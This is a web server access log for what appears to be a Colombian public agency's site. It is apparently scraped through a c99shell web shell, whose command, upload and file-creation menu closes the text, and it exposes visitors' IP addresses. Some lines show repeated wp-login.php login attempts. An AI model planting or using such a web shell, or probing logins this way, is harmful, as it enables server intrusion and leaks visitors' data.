186.84.21.166 - - [05/Mar/2023:23:09:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:07 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
123.183.224.29 - - [05/Mar/2023:23:09:10 -0500] "-" 408 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12176
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [05/Mar/2023:23:09:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.91.209.34 - - [05/Mar/2023:23:09:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.91.209.34 - - [05/Mar/2023:23:09:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.91.209.34 - - [05/Mar/2023:23:09:26 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [05/Mar/2023:23:08:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Mar/2023:23:10:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:09:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
123.183.224.30 - - [05/Mar/2023:23:13:31 -0500] "-" 408 -
201.245.192.253 - - [05/Mar/2023:23:13:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:23:15:41 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [05/Mar/2023:23:15:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:15:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5473&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1296
181.32.186.101 - - [05/Mar/2023:23:16:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5473.pdf HTTP/1.1" 200 383590
172.22.2.4 - - [05/Mar/2023:23:14:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:15:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [05/Mar/2023:23:16:50 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3576&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1310
181.32.186.101 - - [05/Mar/2023:23:16:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3576.pdf HTTP/1.1" 200 395455
172.22.2.4 - - [05/Mar/2023:23:17:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1432&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1100
181.32.186.101 - - [05/Mar/2023:23:17:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1432.pdf HTTP/1.1" 200 539480
172.22.2.4 - - [05/Mar/2023:23:15:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
138.94.236.235 - - [05/Mar/2023:23:17:24 -0500] "-" 408 -
201.245.192.253 - - [05/Mar/2023:23:17:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40637
201.245.192.253 - - [05/Mar/2023:23:17:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43277
201.245.192.253 - - [05/Mar/2023:23:18:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
216.245.221.92 - - [05/Mar/2023:23:20:42 -0500] "HEAD / HTTP/1.1" 200 -
45.233.112.131 - - [05/Mar/2023:23:20:54 -0500] "-" 408 -
172.22.2.4 - - [05/Mar/2023:23:21:20 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [05/Mar/2023:23:20:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.10 - - [05/Mar/2023:23:22:45 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
186.154.32.99 - - [05/Mar/2023:23:22:56 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
172.22.2.4 - - [05/Mar/2023:23:21:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [05/Mar/2023:23:23:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
216.245.221.92 - - [05/Mar/2023:23:25:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:23:27:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40637
201.245.192.253 - - [05/Mar/2023:23:27:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43277
190.66.247.53 - - [05/Mar/2023:23:27:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13015
190.66.247.53 - - [05/Mar/2023:23:28:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 139386
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:28:03 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
172.22.2.4 - - [05/Mar/2023:23:26:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:23:28:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:23:27:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
123.183.224.29 - - [05/Mar/2023:23:30:09 -0500] "-" 408 -
216.245.221.92 - - [05/Mar/2023:23:30:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.7 - - [05/Mar/2023:23:31:11 -0500] "-" 408 -
66.249.66.65 - - [05/Mar/2023:23:31:40 -0500] "-" 408 -
185.119.81.97 - - [05/Mar/2023:23:33:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [05/Mar/2023:23:33:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [05/Mar/2023:23:33:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:23:32:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.118 - - [05/Mar/2023:23:34:10 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:23:33:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 41464
172.22.2.4 - - [05/Mar/2023:23:33:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45134
216.245.221.92 - - [05/Mar/2023:23:35:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:37:14 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [05/Mar/2023:23:37:23 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [05/Mar/2023:23:37:24 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
201.245.192.253 - - [05/Mar/2023:23:37:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40637
201.245.192.253 - - [05/Mar/2023:23:37:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43277
172.22.2.4 - - [05/Mar/2023:23:37:39 -0500] "GET /BLA/boletinlegal/t4 HTTP/1.1" 404 1018
172.22.2.4 - - [05/Mar/2023:23:37:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
201.245.192.253 - - [05/Mar/2023:23:38:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
173.252.87.21 - - [05/Mar/2023:23:38:56 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:23:38:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
162.55.175.142 - - [05/Mar/2023:23:40:29 -0500] "GET / HTTP/1.1" 200 319
162.55.175.142 - - [05/Mar/2023:23:40:29 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [05/Mar/2023:23:38:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [05/Mar/2023:23:40:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:40:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [05/Mar/2023:23:40:44 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [05/Mar/2023:23:40:45 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [05/Mar/2023:23:40:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.244.238.63 - - [05/Mar/2023:23:41:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 463422
201.245.192.253 - - [05/Mar/2023:23:43:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
52.167.144.42 - - [05/Mar/2023:23:44:35 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/NormatividadPEV.pdf HTTP/1.1" 200 96211
172.22.2.4 - - [05/Mar/2023:23:43:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Mar/2023:23:45:42 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [05/Mar/2023:23:46:00 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [05/Mar/2023:23:46:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [05/Mar/2023:23:44:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
66.249.66.45 - - [05/Mar/2023:23:47:11 -0500] "-" 408 -
201.245.192.253 - - [05/Mar/2023:23:48:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:23:49:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
216.245.221.92 - - [05/Mar/2023:23:50:42 -0500] "HEAD / HTTP/1.1" 200 -
123.183.224.29 - - [05/Mar/2023:23:51:08 -0500] "-" 408 -
172.22.2.4 - - [05/Mar/2023:23:49:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:50:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [05/Mar/2023:23:53:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
185.119.81.104 - - [05/Mar/2023:23:55:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [05/Mar/2023:23:55:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [05/Mar/2023:23:55:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [05/Mar/2023:23:55:43 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [05/Mar/2023:23:55:44 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [05/Mar/2023:23:55:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
190.66.247.53 - - [05/Mar/2023:23:55:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41031
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:55:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34402
190.66.247.53 - - [05/Mar/2023:23:55:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:00 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13052
172.22.2.4 - - [05/Mar/2023:23:56:01 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2686&usuario=&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 1339
172.22.2.4 - - [05/Mar/2023:23:56:02 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
186.31.159.232 - - [05/Mar/2023:23:56:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2686.pdf HTTP/1.1" 200 386159
186.31.159.232 - - [05/Mar/2023:23:56:05 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.66.247.53 - - [05/Mar/2023:23:56:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12877
190.66.247.53 - - [05/Mar/2023:23:56:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13060
190.66.247.53 - - [05/Mar/2023:23:56:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 144645
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.66.247.53 - - [05/Mar/2023:23:56:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [05/Mar/2023:23:55:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
190.66.247.53 - - [05/Mar/2023:23:56:20 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
66.220.149.11 - - [05/Mar/2023:23:57:00 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
172.22.2.4 - - [05/Mar/2023:23:55:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Mar/2023:23:56:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
201.245.192.253 - - [05/Mar/2023:23:58:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
168.119.252.242 - - [05/Mar/2023:23:59:23 -0500] "GET / HTTP/1.1" 200 319
168.119.252.242 - - [05/Mar/2023:23:59:23 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.61 - - [05/Mar/2023:23:59:30 -0500] "GET / HTTP/1.1" 200 319
168.119.253.61 - - [05/Mar/2023:23:59:34 -0500] "GET / HTTP/1.1" 200 4720

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.2964 ]--